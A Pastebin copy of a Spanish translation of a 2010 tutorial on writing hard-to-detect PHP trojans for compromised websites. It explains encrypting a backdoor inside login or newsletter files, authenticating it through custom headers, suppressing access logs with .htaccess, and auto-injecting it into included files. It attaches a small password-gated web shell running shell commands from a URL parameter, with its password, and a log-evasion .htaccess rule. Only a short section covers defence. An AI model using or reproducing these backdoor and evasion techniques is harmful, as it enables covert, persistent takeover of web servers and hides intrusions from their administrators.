Advertisement
RedBirdTeam

Introducción a los troyanos en PHP

Apr 21st, 2018
390
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.31 KB | None | 0 0
  1. |=--------------------------------------------------------------------------------------------------=|
  2. |=---------------------------=[Introducción a los troyanos en php]=---------------------------------=|
  3. |=-------------------------------------=[ 28 enero 2010 ]=------------------------------------------=|
  4. |=----------------------------------=[ Por shad0w_crash ]=----------------------------------------=|
  5. |=---------------------------------=[ Traducido por seth ]=---------------------------------------=|
  6. |=--------------------------------------------------------------------------------------------------=|
  7.  
  8.  
  9. Indice
  10.  
  11. 1) Introducción
  12. 2) Suposiciones
  13. 3) Encriptación del código
  14. 4) Ocultamiento de la petición
  15. 5) Inyección
  16. 6) Medidas
  17. 7) Contacto
  18.  
  19. Adjunto 1: Troyano sencillo en php
  20. Adjunto 2: .htaccess
  21.  
  22. ---------------------------------------------------------------------------------------------------------
  23. 1. Introducción
  24.  
  25. Este es mi segundo tutorial asi que sentite libre de enviarme comentarios. El objetivo de este texto es proveer un poco de teoria sobre la creación de troyanos en lenguajes de scripting (en este caso php). No todos los ejemplos están completamente discutidos, así que hay lugar para el debate.
  26. Todo el tema de escribir troyanos es un gran tabú, espero que escribiendo este documento pueda haber un poco de discusión. No quiero quiero que los sitios web sean infectados por troyanos, por eso escribí un montón en pseudo código y no hice una versión que funcione (por favor, no hagas una).
  27.  
  28. ---------------------------------------------------------------------------------------------------------
  29. 2. Suposiciones
  30.  
  31. Para lograr un troyano en php menos detectable, tenemos algunas dificultades:
  32.  
  33. * Cuando accedés a el, la petición aparece en los archivos de log.
  34. * Cuando aparece un archivo adicional en el directorio web, puede a ser detectado por alguien.
  35. * Cuando agregás código a un index, lo puede ver un programador.
  36. * Cuando agregás código a un index, este va a ser sobreescrito en la proxima actualización.
  37.  
  38. Este texto no va a solucionar todos esos problemas. Para dar una mejor visión general hice algunas suposiciones:
  39.  
  40. * Cuando se actualiza una aplicación web y todos los archivos son reemplazados, probablemente se den cuenta de que algo le pasó al código y tu troyano no va a durar mucho tiempo. Para hacer mejores troyanos, no tenes que estar en este nivel del sistema operativo.
  41. * Si el webmaster calcula los hashes de los archivos y los compara periódicamente, los métodos descriptos no van a funcionar (se que se puede solucionar encontrando colisiones pero eso es muy complicado).
  42. * El webmaster no puede crackear (T)DES, GOST, AES, etc.
  43.  
  44. ---------------------------------------------------------------------------------------------------------
  45. 3. Encriptación del código
  46.  
  47. Para crear un troyano en PHP dificil de detectar, necesitamos tener uno que funcione para usarlo de base (ver adjunto 1). El funcionamiento de este troyano menos detectable es encriptando el original. El código encriptado es guardado en una función (desde ahora la vamos a llamar f1) que:
  48.  
  49. 1) Desencripta el archivo y lo pone en un .php con nombre aleatorio.
  50. 2) Envia la petición original a ese archivo temporal.
  51. 3) Elimina el archivo.
  52.  
  53. Con esto solucionamos algunos problemas. El programador no conoce y no puede conocer que hace la función. Tampoco lo van a hacer las herramientas que analizan el código, porque la unica forma es desencriptando la cadena, con la contraseña. También f1 puede ser insertado en index.php, indicando que la función solo debe ser ejecutada si una variable específica está activada (si no, todas las peticiones al archivo invocarian al troyano).
  54.  
  55. El mejor lugar para poner esta función son archivos como newsletter.php y login.php, ya que los archivos de librerias y el index son actualizados frecuentemente.
  56.  
  57. ---------------------------------------------------------------------------------------------------------
  58. 4. Ocultamiento de la petición
  59.  
  60. Un desafio que quedó, es evitar que todas las peticiones aparescan en los logs. Voy a diferenciar dos peticiones, la primera es al archivo que contiene f1 y la segunda es la que f1 le hace al archivo temporal desencriptado.
  61.  
  62. Cuando ves una petición http normal hay mucha mas información que solo el GET o el POST. Pueden ser usadas un monton de cabeceras como Accept-Language, User-Agent, etc [1]. Usando getallheaders() podes verlas todas. Tenemos dos opciones:
  63. * Extender nuestra petición con un nuevo valor (violando el RFC, pero con menos chances de que aparesca en los logs.
  64. * Usar un valor elejido para algo en el RFC (y abusarlo, entonces hay mas chances de que un IDS lo detecte)
  65.  
  66. La función ahora puede obtener sus variables para autentificarse y ejecutar el proceso interno.
  67. ** ADVERTENCIA ** esto es seguridad por oscuridad. Es posible sniffear y repetir el ataque. Incluso cuando el servidor usa ssl, hay posibilidades de que el administrador haya puesto una herramienta que lo registre. Entonces, el podria repetir el ataque y darse cuenta de que hay un troyano.
  68. Para evitar esto tenemos que enviar una variable extra al servidor un nuevo hash sha512 que reemplace al anterior. Así seria imposible repetir el ataque porque la contraseña funciona una sola vez.
  69. La segunda petición es mas facil de esconder, para eso vamos a extender f1:
  70. 1) Crea un directorio con nombre aleatorio.
  71. 2) Escribe el .htaccess en ese directorio.
  72. 3) Desencripta el troyano en un archivo temporal con nombre aleatorio, en el directorio anterior.
  73. 4) Envia la petición original al archivo temporal.
  74. 5a) Elimina el archivo temporal
  75. 5b) Elimina el .htaccess
  76. 5c) elimina el directorio
  77. De esta forma, no van a quear rastros en el log de acceso.
  78.  
  79. ---------------------------------------------------------------------------------------------------------
  80. 5. Inyección
  81.  
  82. Ahora que sabemos como esconder el troyano y como ocultarlo (lo mas posible), necesitamos un lugar para guardarlo. Al principio mencioné que puede estar en index.php o algun archivo similar, pero hay formas mas eficientes. Vamos a crear un script que haga lo siguiente:
  83.  
  84. 1) Buscar una llamada a la función include()
  85. 2a) Tomar aleatoriamente dos archivos de los que se incluyen
  86. 2b) Si no se encuentran, se trabaja sobre el archivo actual
  87. 3) Buscar en el archivo variables de f1
  88. 4a) Si no coincide, insertar f1
  89. 4b) Si coincide, reemplazar variables en f1 y despues insertar la función
  90.  
  91. ---------------------------------------------------------------------------------------------------------
  92. 6. Medidas
  93.  
  94. Lo mejor que podes hacer para no ser infectado por un troyano web es mantener el software actualizado. Cuando tu sitio no es explotable, hay menos posibilidades de ser infectado. También, podes crear una lista con hashes de los archivos, guardarla en una computadora remota y compararlos periódicamente. De esta forma te vas a enterar de los cambios en los archivos.
  95. ---------------------------------------------------------------------------------------------------------
  96. 7. Contacto
  97. Si tenes algo que añadir, simplemente copiá el texto y envialo al sitio de donde lo sacaste. Para contactarme: http://twitter.com/shad0w_crash (NdT: el habla en inglés, para contactarme a mi http://elrincondeseth.wordpress.com/ o "xd punto seth ar@ro@ba gmail p.u.n.t.o com")
  98.  
  99. ---------------------------------------------------------------------------------------------------------
  100. Attach 1: Most easy PHP trojan.
  101.  
  102. Adjunto 1: Troyano sencillo en PHP.
  103. <?php
  104. error_reporting(0);
  105. $action = $_GET['cmd'];
  106. $pw = $_GET['pw'];
  107. $password = "7a3b4197c700b7a94efef0a0590f465664ff210e120156a8c70913c1302fc06fa1bc85cffbf2fb113f99323f08e91489dd4531a0c3657b22fdc065f87b799f5b";
  108. /* Remove this line!, password= Hasdf4g */
  109. if( hash('sha512',$pw) == $password)
  110. {
  111. echo system($cmd);
  112. }
  113. ?>
  114.  
  115.  
  116. ---------------------------------------------------------------------------------------------------------
  117. Attach 2: .Htaccess.
  118.  
  119. Adjunto 2: .htaccess.
  120.  
  121. SetEnvIf Request_URI "^/tmpdir/tempfile\.php$" dontlog
  122. <Limit GET POST HEAD>
  123. order deny,allow
  124. deny from all
  125. allow from 127.0.0.1 (or the remote ip of the server).
  126. </Limit>
  127.  
  128. La primer regla evita los logs de acceso para el archivo.
  129. La segunda solo permite peticiones por el servidor mismo.
  130.  
  131.  
  132. [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement